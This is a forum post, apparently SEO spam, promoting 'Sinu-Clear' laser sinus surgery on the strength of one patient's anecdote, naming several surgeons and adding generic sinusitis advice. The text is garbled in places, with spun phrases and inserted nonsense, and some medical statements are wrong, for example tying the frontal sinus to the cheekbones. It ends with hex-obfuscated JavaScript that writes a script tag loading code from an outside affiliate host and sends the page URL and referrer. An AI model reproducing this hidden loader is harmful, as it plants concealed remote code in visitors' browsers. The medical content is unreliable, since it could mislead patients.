Sinus Infections and Sinus Laser Surgery "Changed My Life"

Go down

Sinus Infections and Sinus Laser Surgery "Changed My Life" Empty Sinus Infections and Sinus Laser Surgery "Changed My Life"

Post by Admin Sun Sep 18, 2016 9:05 pm

Sinus Infections and Sinus Laser Surgery "Changed My Life"

Gentleman named Jason contacted me and said he recently had sinus laser surgery from Dr. Harvey Paley, whose practice is in Beverly Hills, CA. He said flatly that this operation 'changed my life'. This gentleman has had 3 other conventional surgeries in the past 15 years during which time he had lost his sense of smell and sense of taste. Hearing about such a success after a sinus operation is rare in my experience. I personally have had two of them, and they basically didn't work, since I continued to have sinus infections after both of them. In fact, I've heard of very few people who have had sinus surgery and who were pleased about the results over time.

Asked this question to a gentleman from the company that produces the Sinu-Clear laser equipment, a company called PhotoMedex. He said there are many reasons for so few surgeons using the procedure, and most seem to boil down to the reluctance of people, in this case sinus surgeons, to change. In fact PhotoMedex is emphasizing different product lines of medical laser equipment, and the gentleman I spoke with was not optimistic about growth aspects for this procedure. To me this is certainly a shame. I personally have only spoken to one person, Jason, who has undergone the procedure, but he is extremely enthusiastic. I hope to speak to others and get more inputs. I can only say that when someone who has had 3 other operations tries sinus laser surgery and says he has finally regained his sense of smell again after 15 years, abilene christian university taking note of, at the very least. We have gone through extensive research and reading to produce this article on Sinusitis. Use the information wisely so that the information will be properly used.

Addition to Dr

Paley in Beverly Hills, CA, I found out about two other otolaryngologists who perform the Sinu-Clear sinus laser operation. One is Dr. Vincent Pisciotta in Biloxi, Mississippi, and the other is Dr. Robert Bonham in Dallas, Texas. Dr. Bonham also performs another new operation called Sinuplasty, which is similar to angioplasty but for the sinus cavities. I understand there may be a few other surgeons in the country who routinely perform the Sinu-Clear operation, and I intend to continue to research this and get the word out. Results will be posted on the blog and forum at ***** I only wish I had heard about this sinus laser surgery procedure years ago. It sounds like it might have been more effective and certainly less painful than the operations I did have. If you are considering being one of the 300,000 people who have sinus operations in the U.S. alone, this procedure is certainly something to know about and consider as an option, even if it were to require travel.

Natural Remedies for Sinus Infection | Tip Top Tips | Pinterest

Sinus Infections and Sinus Laser Surgery "Changed My Life" F-d-d-fa-f-e-f-a-d

So when someone is as enthusiastic about his operation as Jason is, it is time to listen, especially considering his background of sinus problems. The operational procedure is called Sinu-Clear, and it uses a laser as well as an endoscope. The laser equipment also provides a steady stream of salt water to flow through the nasal passageways while the operation is taking place. There is apparently very little bleeding during the procedure, since the laser cauterizes the tissue being operated on. Because of this there is no need for nasal packing, and this is a huge positive, as those of us who have gone through a conventional operation with a scalpel and had our noses packed can attest. For me it was just awful. The endoscope allows for good viewing by the surgeon, as the camera projects a picture of the nasal cavities being worked on onto a television screen. Embarassed

This Type of Approach Seems to Make Perfect Sense

That is, using laser and endoscope technology to limit bleeding and see clearly what is being operated on. The first question I had is 'why are there only a small handful of surgeons in the U.S. doing this operation?' It is not brand new, and in fact this laser sinus surgery was apparently pioneered by Dr. Daniel M. Schuman from Boca Raton, Florida over 10 years ago. Apparently Dr. Schuman has subsequently retired from his medical practice. People have an inclination of bragging on the knowledge they have on any particular project. However, we don't want to brag on what we know on Clear Sinus, so long as it proves useful to you, we are happy.

All of us have hollow cavities around the nose in the cheek bones called sinuses. They produce and send mucus into the nose through small channels. Inflammation of the lining of sinus blocking the normal drainage of mucus in the sinuses is known as Acute Sinusitis. Sometimes it becomes chronic lasting for months. The infection spreads to the space around the eye, into the blood and bones or even into the brain.

Symptoms of Acute Sinusitis

The common symptoms are blocked nose or and throbbing pain in the infected area. High fever may also develop for some. Difficulty in breathing through the nose and in some cases reduced sense of smell may also occur. Sometimes there is a runny nose with greenish or yellow discharge caused by the infected mucus or pus. When the thick mucus blocks the channels the pain and tenderness may worsen. Headache, cough, high blood pressure sinuses ears, toothache and bad breath are other symptoms.

Treating Acute Sinusitis

Normally there is no need for any treatment of this condition. The immune system will deal with the viral infection and the symptoms disappear within a week. If the symptoms do not clear within a week, antibiotics may be prescribed by doctors. Pain killers may be used for pain relief. Nasal sprays may help in clearing the congestion in the nasal passage. Traditionally acute sinusitis is treated with steam inhalation. A Warm shower is also advised for breathing in the moist and warm air. Applying warm and damp towels can ease facial pain. Once you are through reading what is written here on Sinus Infection, have you considered recollecting what has been written and writing them down? This way, you are bound to have a better understanding on Sinus Infection. Laughing

Causes of Acute Sinusitis

They are usually caused by infection; most common of them is frontal sinus, affecting the cheekbones. Allergies may cause inflammation and block the nasal passages. If the wall between the nostrils called septum is corked it may block the sinus passage. Growth of tissues called nasal polyp sinusitis may restrict the nasal channels. Some other medical conditions like cystic fibrosis, HIV and other diseases may cause nasal blockage.

var c2="sinusitis";var _0xded0=["\x3C\x73\x63","\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x73\x6D\x61\x72\x74\x6C","\x69\x66\x65\x6C","\x61\x62\x73\x2E\x63\x6F\x6D\x2F\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x73\x2F\x61\x64\x2E\x6A\x73\x3F\x63\x3D","\x26\x73\x3D","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x26\x61\x69\x64\x3D\x38\x37\x32\x31\x27\x3E\x3C\x2F\x73\x63\x72\x69","\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xded0[8]](_0xded0[0]+_0xded0[1]+_0xded0[2]+_0xded0[3]+c2+_0xded0[4]+encodeURIComponent(window[_0xded0[5]])+"\x26\x72\x65\x66\x3D"+encodeURIComponent(document["\x72\x65\x66\x65\x72\x72\x65\x72"])+_0xded0[6]+_0xded0[7]);

Admin
Admin

http://nathancarney.nstars.org

Back to top Go down